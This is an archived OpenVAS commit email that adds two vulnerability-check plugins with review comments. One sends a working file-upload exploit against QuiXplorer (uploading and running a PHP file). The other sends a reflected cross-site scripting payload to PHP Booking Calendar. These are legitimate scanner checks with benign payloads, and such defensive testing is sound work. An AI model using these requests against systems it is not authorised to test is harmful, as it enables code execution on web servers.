[Openvas-commits] r12412 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Thu Jan 5 14:42:48 CET 2012


Author: mime
Date: 2012-01-05 14:42:15 +0100 (Thu, 05 Jan 2012)
New Revision: 12412

Added:
   trunk/openvas-plugins/scripts/gb_QuiXplorer_50673.nasl
   trunk/openvas-plugins/scripts/gb_php_booking_calendar_51119.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
Log:
Added new plugins

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2012-01-05 13:38:15 UTC (rev 12411)
+++ trunk/openvas-plugins/ChangeLog	2012-01-05 13:42:15 UTC (rev 12412)
@@ -1,3 +1,9 @@
+2012-01-05  Michael Meyer <michael.meyer at greenbone.net>
+
+	* scripts/gb_QuiXplorer_50673.nasl,
+	scripts/gb_php_booking_calendar_51119.nasl:
+	Added new plugins.
+
 2012-01-05  Henri Doreau <henri.doreau at greenbone.net>
 
 	* scripts/secpod_splunk_multiple_vuln.nasl: Updated CVSS from SCAP data.

Added: trunk/openvas-plugins/scripts/gb_QuiXplorer_50673.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_QuiXplorer_50673.nasl	2012-01-05 13:38:15 UTC (rev 12411)
+++ trunk/openvas-plugins/scripts/gb_QuiXplorer_50673.nasl	2012-01-05 13:42:15 UTC (rev 12412)
@@ -0,0 +1,224 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# QuiXplorer 'index.php' Arbitrary File Upload Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License
+# as published by the Free Software Foundation; either version 2
+# of the License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103377);
+ script_bugtraq_id(50673);
+ script_cve_id("CVE-2011-5005");
+ script_tag(name:"cvss_base", value:"7.5");
+ script_version ("$Revision$");
+
+ script_name("QuiXplorer 'index.php' Arbitrary File Upload Vulnerability");
+
+desc = "Overview:
+QuiXplorer is prone to an arbitrary-file-upload vulnerability because
+the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this issue to upload arbitrary code and run it
+in the context of the webserver process.
+
+QuiXplorer 2.3 is vulnerable; other versions may also be affected.
+
+References:
+http://www.securityfocus.com/bid/50673
+http://quixplorer.sourceforge.net/";
+
+ script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-01-05 11:51:25 +0100 (Thu, 05 Jan 2012)");
+ script_description(desc);
+ script_summary("Determine if QuiXplorer is prone to an arbitrary-file-upload vulnerability");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2012 Greenbone Networks GmbH");
+ script_dependencies("gb_quixplorer_detect.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("version_func.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+if(!dir = get_dir_from_kb(port:port, app:"QuiXplorer")){
+  exit(0);
+}
+
+url = string(dir,"/index.php?action=upload&order=type&srt=yes"); 
+host = get_host_name();
+filename = "openvas-" + rand() + ".php";
+len = 1982 + strlen(filename);
+
+req = string("POST ",url," HTTP/1.1\r\n",
+             "Host: ",host,"\r\n",
+             "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:9.0) Gecko/20100101 OpenVAS/4.0\r\n",
+             "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n",
+             "Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\n",
+             "Accept-Encoding: gzip, deflate\r\n",
+             "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n",
+             "DNT: 1\r\n",
+             "Connection: keep-alive\r\n",
+             "Referer: http://",host,url,"\r\n",
+             "Content-Type: multipart/form-data; boundary=---------------------------5307133891507148240988240459\r\n",
+             "Content-Length: ",len,"\r\n",
+             "\r\n",
+             "-----------------------------5307133891507148240988240459\r\n",
+             'Content-Disposition: form-data; name="MAX_FILE_SIZE"',"\r\n",
+             "\r\n",
+             "2097152\r\n",
+             "-----------------------------5307133891507148240988240459\r\n",
+             'Content-Disposition: form-data; name="confirm"',"\r\n",
+             "\r\n",
+             "true\r\n",
+             "-----------------------------5307133891507148240988240459\r\n",
+             'Content-Disposition: form-data; name="userfile[]"; filename="',filename,'"',"\r\n",
+             "Content-Type: application/x-php\r\n",
+             "\r\n",
+             '<?php phpinfo(); ?>',"\r\n",
+             "\r\n", 
+             "-----------------------------5307133891507148240988240459\r\n",
+             'Content-Disposition: form-data; name="userfile[]"; filename=""',"\r\n",
+             "Content-Type: application/octet-stream\r\n",
+             "\r\n",
+             "\r\n",
+             "-----------------------------5307133891507148240988240459\r\n",
+             'Content-Disposition: form-data; name="userfile[]"; filename=""',"\r\n",
+             "Content-Type: application/octet-stream\r\n",
+             "\r\n", 
+             "\r\n",
+             "-----------------------------5307133891507148240988240459\r\n",
+             'Content-Disposition: form-data; name="userfile[]"; filename=""',"\r\n",
+             "Content-Type: application/octet-stream\r\n",
+             "\r\n", 
+             "\r\n",
+             "-----------------------------5307133891507148240988240459\r\n",
+             'Content-Disposition: form-data; name="userfile[]"; filename=""',"\r\n",
+             "Content-Type: application/octet-stream\r\n",
+             "\r\n",
+             "\r\n",
+             "-----------------------------5307133891507148240988240459\r\n",
+             'Content-Disposition: form-data; name="userfile[]"; filename=""',"\r\n",
+             "Content-Type: application/octet-stream\r\n",
+             "\r\n",
+             "\r\n",
+             "-----------------------------5307133891507148240988240459\r\n",
+             'Content-Disposition: form-data; name="userfile[]"; filename=""',"\r\n",
+             "Content-Type: application/octet-stream\r\n",
+             "\r\n",
+             "\r\n", 
+             "-----------------------------5307133891507148240988240459\r\n",
+             'Content-Disposition: form-data; name="userfile[]"; filename=""',"\r\n",
+             "Content-Type: application/octet-stream\r\n",
+             "\r\n", 
+             "\r\n",
+             "-----------------------------5307133891507148240988240459\r\n",
+             'Content-Disposition: form-data; name="userfile[]"; filename=""',"\r\n",
+             "Content-Type: application/octet-stream\r\n",
+             "\r\n",
+             "\r\n",
+             "-----------------------------5307133891507148240988240459\r\n",
+             'Content-Disposition: form-data; name="userfile[]"; filename=""',"\r\n",
+             "Content-Type: application/octet-stream\r\n",
+             "\r\n",
+             "\r\n",
+             "-----------------------------5307133891507148240988240459--\r\n");
+
+
+result = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+
+if(result =~ "HTTP/1.. 302" && "Location:" >< result) {
+
+  lines = split(result);
+  foreach line (lines) {
+
+    if(egrep(pattern:"Location:",string:line)) {
+
+      location = eregmatch(pattern:"Location: (.*)$",string:line);
+      break;
+
+    }
+
+  }
+
+  if(isnull(location[1]))exit(0);
+  
+  url = chomp(location[1]);
+  req1 = http_get(item:url, port:port);
+  buf = http_keepalive_send_recv(port:port, data:req1, bodyonly:FALSE);
+
+  if(filename >!< buf)exit(0);
+
+  lines = split(buf);
+  foreach line (lines) {
+
+    if(filename >< line && "<A HREF=" >< line) {
+
+      url = eregmatch(pattern:'<A HREF="([^"]+)"',string:line);
+      break;
+    }
+
+  }
+  
+  if(isnull(url[1]))exit(0);
+
+  req2 = http_get(item:url[1], port:port);
+  buf2 = http_keepalive_send_recv(port:port, data:req2, bodyonly:FALSE);
+
+  if("<title>phpinfo()" >< buf2) {
+
+    # delete uploaded file
+    del = "do_action=delete&first=y&selitems%5B%5D=" + filename;
+    req = string("POST ",dir,"/index.php?action=post&order=type&srt=yes HTTP/1.1\r\n",
+                 "Host: ",host,"\r\n",
+                 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:9.0) Gecko/20100101 OpenVAS/4.0\r\n",
+                 "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n",
+                 "Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\n",
+                 "Accept-Encoding: gzip, deflate\r\n",
+                 "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n",
+                 "DNT: 1\r\n",
+                 "Connection: keep-alive\r\n",
+                 "Referer: http://",host,url,"\r\n",
+                 "Content-Type: application/x-www-form-urlencoded\r\n",
+                 "Content-Length: ",strlen(del),"\r\n",
+                 "\r\n",
+                 del);  
+
+    result = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+
+    security_hole(port:port);
+    exit(0);
+  }
+
+}
+
+exit(0);
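Review bot: The Referer header of the cleanup (delete) request is built from `url`, but by then `url` is the array returned by the `eregmatch` in the second `foreach` loop — the script itself reads `url[1]` right afterwards for `req2` — so the header is no longer the string path; use `"Referer: http://",host,url[1],"\r\n"` or keep the original path in a separate variable. The response to the delete request is then discarded, so if the delete fails the `phpinfo()` file this test uploads stays on the target; checking that `result` does not indicate failure and mentioning the artifact in the reported finding would make the cleanup verifiable. The hard-coded `len = 1982 + strlen(filename);` is also fragile: any later edit to the multipart body silently breaks Content-Length, whereas building the body in its own variable and sending `"Content-Length: ",strlen(body)` keeps it correct by construction.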


Property changes on: trunk/openvas-plugins/scripts/gb_QuiXplorer_50673.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision Date

Added: trunk/openvas-plugins/scripts/gb_php_booking_calendar_51119.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_php_booking_calendar_51119.nasl	2012-01-05 13:38:15 UTC (rev 12411)
+++ trunk/openvas-plugins/scripts/gb_php_booking_calendar_51119.nasl	2012-01-05 13:42:15 UTC (rev 12412)
@@ -0,0 +1,95 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# PHP Booking Calendar 'page_info_message' Parameter Cross Site Scripting Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License
+# as published by the Free Software Foundation; either version 2
+# of the License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103376);
+ script_bugtraq_id(51119);
+ script_cve_id("CVE-2011-5045");
+ script_tag(name:"cvss_base", value:"4.3");
+ script_version ("$Revision$");
+
+ script_name("PHP Booking Calendar 'page_info_message' Parameter Cross Site Scripting Vulnerability");
+
+desc = "Overview:
+PHP Booking Calendar is prone to a cross-site scripting vulnerability
+because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code
+in the browser of an unsuspecting user in the context of the affected
+site. This may allow the attacker to steal cookie-based authentication
+credentials and launch other attacks.
+
+PHP Booking Calendar 10e is vulnerable; other versions may also
+be affected.
+
+References:
+http://www.securityfocus.com/bid/51119
+http://sourceforge.net/projects/bookingcalendar/
+http://www.securityfocus.com/archive/1/520929";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-01-04 15:47:28 +0100 (Wed, 04 Jan 2012)");
+ script_description(desc);
+ script_summary("Determine if PHP Booking Calendar is prone to a cross-site scripting vulnerability");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2012 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+   
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/booking_calendar/","/cal",cgi_dirs());
+
+foreach dir (dirs) {
+   
+  url = string(dir, "/details_view.php?event_id=1&date=2000-12-01&view=month&loc=loc1&page_info_message=<script>alert(/openvas-xss-test/)</script>"); 
+
+  if(http_vuln_check(port:port, url:url,pattern:"<script>alert\(/openvas-xss-test/\)</script>",check_header:TRUE, extra_check:"Booking Calendar")) {
+     
+    security_warning(port:port);
+    exit(0);
+
+  }
+}
+
+exit(0);
+
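Review bot: The `dirs` list mixes `"/booking_calendar/"` (trailing slash) with `"/cal"` (none), and `url` is formed as `string(dir, "/details_view.php?...")`, so the first candidate is requested as `/booking_calendar//details_view.php`; drop the trailing slash, `dirs = make_list("/booking_calendar","/cal",cgi_dirs());`, so every entry is joined the same way. The reflected marker is matched with `check_header:TRUE`, which presumably also scans response headers — a short comment stating why headers are included (e.g. the message may be echoed in a redirect or header) would help the next maintainer; confirm against `http_vuln_check`.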


Property changes on: trunk/openvas-plugins/scripts/gb_php_booking_calendar_51119.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision Date


